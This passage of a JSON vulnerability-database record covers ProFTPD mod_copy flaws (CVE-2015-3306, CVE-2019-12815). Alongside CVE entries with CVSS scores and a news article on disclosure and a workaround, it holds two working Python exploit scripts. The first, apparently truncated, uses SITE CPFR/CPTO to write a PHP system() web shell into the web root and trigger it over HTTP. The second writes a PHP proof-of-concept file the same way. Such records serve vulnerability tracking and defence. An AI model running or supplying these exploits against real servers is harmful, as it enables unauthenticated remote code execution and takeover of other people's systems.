evil = '<?php system(\"' + cmd + '\") ?>'\r\n s.connect((server, 21))\r\n s.recv(1024)\r\n print '[ + ] Connected to server [ + ] \\n'\r\n s.send('site cpfr /etc/passwd')\r\n s.recv(1024)\r\n s.send('site cpto ' + evil)\r\n s.recv(1024)\r\n s.send('site cpfr /proc/self/fd/3')\r\n s.recv(1024)\r\n s.send('site cpto ' + directory + 'infogen.php')\r\n s.recv(1024)\r\n s.close()\r\n print '[ + ] Payload sended [ + ]\\n'\r\n print '[ + ] Executing Payload [ + ]\\n'\r\n r = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP\r\n if (r.status_code == 200):\r\n print '[ * ] Payload Executed Succesfully [ * ]'\r\n else:\r\n print ' [ - ] Error : ' + str(r.status_code) + ' [ - ]'\r\n \r\nprint '\\n http://infogen.al/'\n\n# 0day.today [2018-01-06] #", "sourceHref": "https://0day.today/exploit/23544", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2022-03-23T12:28:33", "description": "The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.", "cvss3": {}, "published": "2015-05-18T15:59:00", "type": "cve", "title": "CVE-2015-3306", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306"], "modified": "2021-05-26T20:15:00", "cpe": ["cpe:/a:proftpd:proftpd:1.3.5"], "id": "CVE-2015-3306", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3306", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:proftpd:proftpd:1.3.5:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T19:59:17", "description": "An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows for remote code execution and information disclosure without authentication, a related issue to CVE-2015-3306.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-19T23:15:00", "type": "cve", "title": "CVE-2019-12815", "cwe": ["CWE-755"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306", "CVE-2019-12815"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:proftpd:proftpd:1.3.5b"], "id": "CVE-2019-12815", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12815", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:proftpd:proftpd:1.3.5b:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-05-13T17:37:51", "description": "", "cvss3": {}, "published": "2021-05-26T00:00:00", "type": "exploitdb", "title": "ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2015-3306", "CVE-2015-3306"], "modified": "2021-05-26T00:00:00", "id": "EDB-ID:49908", "href": "https://www.exploit-db.com/exploits/49908", "sourceData": "# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)\r\n# Date: 25/05/2021\r\n# Exploit Author: Shellbr3ak\r\n# Version: 1.3.5 \r\n# Tested on: Ubuntu 16.04.6 LTS\r\n# CVE : CVE-2015-3306\r\n\r\n#!/usr/bin/env python3\r\n\r\nimport sys\r\nimport socket\r\nimport requests\r\n\r\ndef exploit(client, target):\r\n client.connect((target,21)) # Connecting to the target server\r\n banner = client.recv(74)\r\n print(banner.decode())\r\n client.send(b'site cpfr /etc/passwd\\r\\n')\r\n print(client.recv(1024).decode())\r\n client.send(b'site cpto <?php phpinfo(); ?>\\r\\n') # phpinfo() is just a PoC.\r\n print(client.recv(1024).decode())\r\n client.send(b'site cpfr /proc/self/fd/3\\r\\n')\r\n print(client.recv(1024).decode())\r\n client.send(b'site cpto /var/www/html/test.php\\r\\n')\r\n print(client.recv(1024).decode())\r\n client.close()\r\n print('Exploit Completed')\r\n\r\ndef check(url):\r\n req = requests.get(url) # Requesting the written PoC php file via HTTP\r\n if req.status_code == 200:\r\n print('[+] File Written Successfully')\r\n print(f'[+] Go to : {url}')\r\n else:\r\n print('[!] Something Went Wrong')\r\n print('[!] Directory might not be writable')\r\n\r\ndef main():\r\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n target = sys.argv[1]\r\n exploit(client, target)\r\n url = 'http://' + target + '/test.php'\r\n check(url)\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/49908", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:53", "description": "[](<https://thehackernews.com/images/-j8m5YT2TzXU/XTcrVmly8VI/AAAAAAAA0hc/MrjnHguT7fAlj4Pu6BPcovPh66orVoIuACLcBGAs/s728-e100/linux-ftp-server.png>)\n\nA German security researcher has publicly disclosed details of a serious vulnerability in one of the most popular FTP server applications, which is currently being used by more than one million servers worldwide. \n \nThe vulnerable software in question is **ProFTPD**, an open source FTP server used by a large number of popular businesses and websites including SourceForge, Samba and Slackware, and comes pre-installed with many Linux and Unix distributions, like Debian. \n \nDiscovered by [Tobias M\u00e4del](<https://tbspace.de/cve201912815proftpd.html>), the vulnerability resides in the mod_copy module of the ProFTPD application, a component that allows users to copy files/directories from one place to another on a server without having to transfer the data to the client and back. \n \nAccording to M\u00e4del, an incorrect access control issue in the mod_copy module could be exploited by an authenticated user to unauthorizedly copy any file on a specific location of the vulnerable FTP server where the user is otherwise not allowed to write a file. \n \nIn rare circumstances, the flaw may also lead to remote code execution or information disclosure attacks. \n \n[John Simpson](<https://twitter.com/thracky>), a security researcher at Trend Micro, told The Hacker News that to successfully achieve remote code execution on a targeted server, an attacker needs to copy a malicious PHP file to a location where it can be executed. \n \nTherefore, it's important to note that not every FTP server running vulnerable ProFTPD can be hijacked remotely, since the attacker requires log-in to the respective targeted server, or the server should have anonymous access enabled. \n\n\n[](<https://thehackernews.com/images/-tRNX-RXdftI/XTcsBfWSKII/AAAAAAAA0hs/dL_QxMehffoKdCYwAvrjbG8bBwge3xmTQCLcBGAs/s728-e100/shodan-search.jpg>)\n\nThe vulnerability, assigned as CVE-2019-12815, affects all versions of ProFTPd, including the latest 1.3.6 version which was released in 2017. \n \nSince the mod_copy module comes enabled by default in most operating systems using ProFTPD, the flaw could potentially affect a large number of servers. \n \nAccording to an [advisory](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12815>), the newly discovered issue is related to a 4-year-old similar vulnerability (CVE-2015-3306) in the mod_copy module that allows remote attackers to read and write to arbitrary files via the site CPFR and site CPTO commands. \n \nM\u00e4del reported the vulnerability to ProFTPd project maintainers in September last year, but the team did not take any action to address the issue for more than 9 months. \n \nSo, the researcher contacted the Debian Security Team last month, after which the ProFTPD team finally [created a patch](<https://github.com/proftpd/proftpd/pull/816>) and just last week backported it to ProFTPD 1.3.6 without releasing a new version of its FTP server. \n \nAs a workaround, server administrators can also disable the mod_copy module in the ProFTPd configuration file in order to protect themselves from being a victim of any attack related to this flaw.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-23T15:47:00", "type": "thn", "title": "A New 'Arbitrary File Copy' Flaw Affects ProFTPD Powered FTP Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306", "CVE-2019-12815"], "modified": "2019-07-23T18:31:50", "id": "THN:AB717FBC8FF7C7C1D194A126C788DF50", "href": "https://thehackernews.com/2019/07/linux-ftp-server-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
ProFTPD mod_copy command execution
